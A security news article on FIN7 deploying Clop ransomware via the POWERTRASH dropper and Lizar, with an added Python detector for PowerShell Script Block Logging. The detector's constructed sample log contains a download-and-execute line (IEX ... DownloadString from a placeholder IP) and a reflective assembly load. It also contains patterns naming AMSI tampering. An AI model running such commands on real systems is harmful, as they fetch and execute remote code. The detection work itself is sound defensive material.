Microsoft analysts report that last month the notorious hacker group FIN7 (also known as Carbanak, Navigator and others) resumed its activity. The researchers were able to link FIN7 to attacks whose ultimate goal was to deploy the Clop ransomware on victims’ networks.
FIN7 Cybercrime Group Goes On
Recall that we also wrote that Clop ransomware continues to operate even after a series of arrests, and that Clop Operators Claim to Hack 130 Organizations Using GoAnywhere MFT Bug.
Information security specialists reported that Clop ransomware operators leaked data from two universities. In the new attacks, FIN7 reportedly used the PowerShell-based POWERTRASH in-memory dropper to deploy the Lizar post-exploitation tool on compromised devices. The attackers thus gain a foothold in the target network and begin lateral movement, so that later, with the help of OpenSSH and Impacket, they can deploy the Clop encryptor across the victim company's network.
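The chain described above starts with a PowerShell dropper that runs its payload entirely in memory, which is why PowerShell Script Block Logging (Windows Event ID 4104) is one of the few places a defender can see it. The following is an added example, not code from the article or from Microsoft's report: a small detector that scans constructed 4104 records for generic indicators of in-memory PowerShell execution (reflective assembly loading, Base64 decoding, download-and-evaluate, encoded commands). The indicator list is a general set of techniques, not a signature for POWERTRASH or any specific malware family, and the log lines, hostnames and addresses are invented for the example.

```python
"""Added example: flag PowerShell 4104 script blocks that show signs of
in-memory code loading. Not the article's or Microsoft's code; the log
records below are constructed and the indicators are generic."""
import re
from dataclasses import dataclass, field

# Generic indicators of script content that loads and runs code without
# writing a file to disk. Each entry: (indicator name, compiled regex).
INDICATORS = [
    ("reflective_assembly_load",
     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)),
    ("encoded_command",
     re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I)),
    ("base64_decode", re.compile(r"FromBase64String\(", re.I)),
    ("iex_on_download",
     re.compile(r"(?:IEX|Invoke-Expression)\b.*"
                r"(?:DownloadString|WebClient|Invoke-WebRequest)", re.I)),
    ("amsi_tamper_hint", re.compile(r"AmsiUtils|amsiInitFailed", re.I)),
    ("compression_stream", re.compile(r"(?:Gzip|Deflate)Stream", re.I)),
]

# Constructed records in a simplified tab-separated form:
# record_id <TAB> hostname <TAB> script block text.
SAMPLE_LOG = [
    "1001\tWS-FIN-01\t$b=[Convert]::FromBase64String($env:X); "
    "$a=[System.Reflection.Assembly]::Load($b); $a.EntryPoint.Invoke($null,$null)",
    "1002\tWS-HR-07\tGet-ChildItem C:\\Users -Recurse | Measure-Object",
    "1003\tSRV-FILE-02\tIEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.23/stage')",
]


@dataclass
class Finding:
    record_id: int
    host: str
    indicators: list = field(default_factory=list)
    severity: str = "low"


def parse_4104(line: str):
    """Parse one constructed record; returns (id, host, block) or None."""
    parts = line.rstrip("\n").split("\t", 2)
    if len(parts) != 3 or not parts[0].isdigit():
        return None
    return int(parts[0]), parts[1], parts[2]


def scan_script_block(block: str) -> list:
    """Return the names of all indicators present in a script block."""
    return [name for name, rx in INDICATORS if rx.search(block)]


def classify(hits: list) -> str:
    """Two or more independent indicators in one block is a strong signal;
    a single one is worth triage but is often benign admin scripting."""
    if len(hits) >= 2:
        return "high"
    if len(hits) == 1:
        return "medium"
    return "low"


def scan_log(lines) -> list:
    """Scan records and return one Finding per block with at least one hit."""
    findings = []
    for line in lines:
        rec = parse_4104(line)
        if rec is None:
            continue
        rid, host, block = rec
        hits = scan_script_block(block)
        if hits:
            findings.append(Finding(rid, host, hits, classify(hits)))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"record {f.record_id} on {f.host}: {f.severity} "
              f"({', '.join(f.indicators)})")
```

The threshold in `classify` is deliberately simple: a single `FromBase64String` is common in legitimate automation, so the detector only escalates when several loader-style primitives appear together in one block. Script Block Logging must be enabled by policy for 4104 events to exist at all, so checking that the events are being collected is the first step before deploying any such rule.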
Cl0p ransomware and FIN7 relationship
According to Microsoft, Clop is just the latest ransomware used by FIN7: the group was previously associated with REvil and Maze, and then with the now defunct BlackMatter and DarkSide RaaS operations. In addition, the media cite a private Microsoft analytical report stating that FIN7 is linked to attacks on PaperCut print management servers that eventually lead to the deployment of ransomware such as Clop, Bl00dy and LockBit.
In a private report, Microsoft analysts write that the financially motivated group FIN11, which the company tracks under the name Lace Tempest, used new tools, including the PowerShell script inv.ps1, which the researchers associate with FIN7. This script was used to deploy the Lizar toolkit mentioned above, which likely indicates that the operators of the two groups have joined forces or have started exchanging attack tools.